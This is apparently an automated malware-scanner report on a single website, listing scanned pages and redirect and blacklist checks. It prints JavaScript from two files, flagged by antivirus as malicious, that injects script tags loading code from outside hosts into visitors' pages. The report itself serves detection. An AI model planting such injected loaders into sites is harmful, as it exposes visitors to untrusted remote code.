New scan:

Malware Scanner report for nnxmx.qjc2.com

Malicious/Suspicious/Total urls checked
4/0/13
4 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.nnxmx.qjc2.com/
200 OK
Content-Length: 4012
Content-Type: text/html
clean
http://www.nnxmx.qjc2.com/img6/head.js
200 OK
Content-Length: 461
Content-Type: application/x-javascript
clean
http://www.nnxmx.qjc2.com/img6/top.js
200 OK
Content-Length: 717
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.writeln('<div style="Z-INDEX: 993104;WIDTH: 990px; POSITION: relative; left:1px; top:1px;"> <script charset="utf-8" src="http://c3.xajx.com/cpc/i.ashx?u=319469&s=0&b=197&w=980&h=130&bl=0&bb=1&ls=1&bc=gray&fc=black&bkc=white"></script> </div>');
document.writeln('<div style="Z-INDEX: 993104;WIDTH: 990px; POSITION: relative; left:1px; top:1px;"> <script charset="utf-8" src="http://c3.xajx.com/cpc/i.ashx?u=319469&s=0&b=197&w=980&h=130&bl=0&bb=1&ls=1&bc=gray&fc=black&bkc=white"></script> </div>');

document.write('<script type="text/javascript">u_a_client="5451";u_a_width="0";u_a_height="0";u_a_zones="43585";u_a_type="1";<\/script><script src="http://d16b4.8ox.cn/i.js"><\/script>');

Antivirus reports:

Emsisoft
Worm.Generic.389275 (B)

http://www.nnxmx.qjc2.com/img6/middle.js
200 OK
Content-Length: 736
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<script language="JavaScript" type="text/javascript" src="http://js.ta80.com/js/55mv.js"></script>');
document.write('<script src="http://js.a3p4.net/page/?s=245224"></script>');

document.writeln('<div style="Z-INDEX: 993104;WIDTH: 990px; POSITION: relative; left:1px; top:1px;"> <script charset="utf-8" src="http://c3.xajx.com/cpc/i.ashx?u=319469&s=0&b=197&w=980&h=130&bl=0&bb=1&ls=1&bc=gray&fc=black&bkc=white"></script> </div>');
document.writeln('<div style="Z-INDEX: 993104;WIDTH: 990px; POSITION: relative; left:1px; top:1px;"> <script charset="utf-8" src="http://c3.xajx.com/cpc/i.ashx?u=319469&s=0&b=197&w=980&h=130&bl=0&bb=1&ls=1&bc=gray&fc=black&bkc=white"></script> </div>');

Antivirus reports:

Emsisoft
Gen:Variant.VBInject.11 (B)

http://js.users.51.la/16767863.js
200 OK
Content-Length: 1979
Content-Type: application/x-javascript
clean
http://www.nnxmx.qjc2.com/img6/foot.js
200 OK
Content-Length: 1364
Content-Type: application/x-javascript
clean
http://www.nnxmx.qjc2.com/aaa/
200 OK
Content-Length: 4044
Content-Type: text/html
clean
http://www.nnxmx.qjc2.com/aaa/../img6/head.js
200 OK
Content-Length: 461
Content-Type: application/x-javascript
clean
http://www.nnxmx.qjc2.com/aaa/../img6/top.js
200 OK
Content-Length: 717
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.writeln('<div style="Z-INDEX: 993104;WIDTH: 990px; POSITION: relative; left:1px; top:1px;"> <script charset="utf-8" src="http://c3.xajx.com/cpc/i.ashx?u=319469&s=0&b=197&w=980&h=130&bl=0&bb=1&ls=1&bc=gray&fc=black&bkc=white"></script> </div>');
document.writeln('<div style="Z-INDEX: 993104;WIDTH: 990px; POSITION: relative; left:1px; top:1px;"> <script charset="utf-8" src="http://c3.xajx.com/cpc/i.ashx?u=319469&s=0&b=197&w=980&h=130&bl=0&bb=1&ls=1&bc=gray&fc=black&bkc=white"></script> </div>');

document.write('<script type="text/javascript">u_a_client="5451";u_a_width="0";u_a_height="0";u_a_zones="43585";u_a_type="1";<\/script><script src="http://d16b4.8ox.cn/i.js"><\/script>');

Antivirus reports:

Emsisoft
Worm.Generic.389275 (B)

http://www.nnxmx.qjc2.com/aaa/../img6/middle.js
200 OK
Content-Length: 736
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<script language="JavaScript" type="text/javascript" src="http://js.ta80.com/js/55mv.js"></script>');
document.write('<script src="http://js.a3p4.net/page/?s=245224"></script>');

document.writeln('<div style="Z-INDEX: 993104;WIDTH: 990px; POSITION: relative; left:1px; top:1px;"> <script charset="utf-8" src="http://c3.xajx.com/cpc/i.ashx?u=319469&s=0&b=197&w=980&h=130&bl=0&bb=1&ls=1&bc=gray&fc=black&bkc=white"></script> </div>');
document.writeln('<div style="Z-INDEX: 993104;WIDTH: 990px; POSITION: relative; left:1px; top:1px;"> <script charset="utf-8" src="http://c3.xajx.com/cpc/i.ashx?u=319469&s=0&b=197&w=980&h=130&bl=0&bb=1&ls=1&bc=gray&fc=black&bkc=white"></script> </div>');

Antivirus reports:

Emsisoft
Gen:Variant.VBInject.11 (B)

http://js.users.51.la/16732133.js
200 OK
Content-Length: 1980
Content-Type: application/x-javascript
clean
http://www.nnxmx.qjc2.com/aaa/../img6/foot.js
200 OK
Content-Length: 1364
Content-Type: application/x-javascript
clean
http://www.nnxmx.qjc2.com/test404page.js
404 Not Found
Content-Length: 1034
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: nnxmx.qjc2.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: nnxmx.qjc2.com
Referer: http://www.google.com/search?q=nnxmx.qjc2.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=nnxmx.qjc2.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nnxmx.qjc2.com/

Result: nnxmx.qjc2.com is not infected or malware details are not published yet.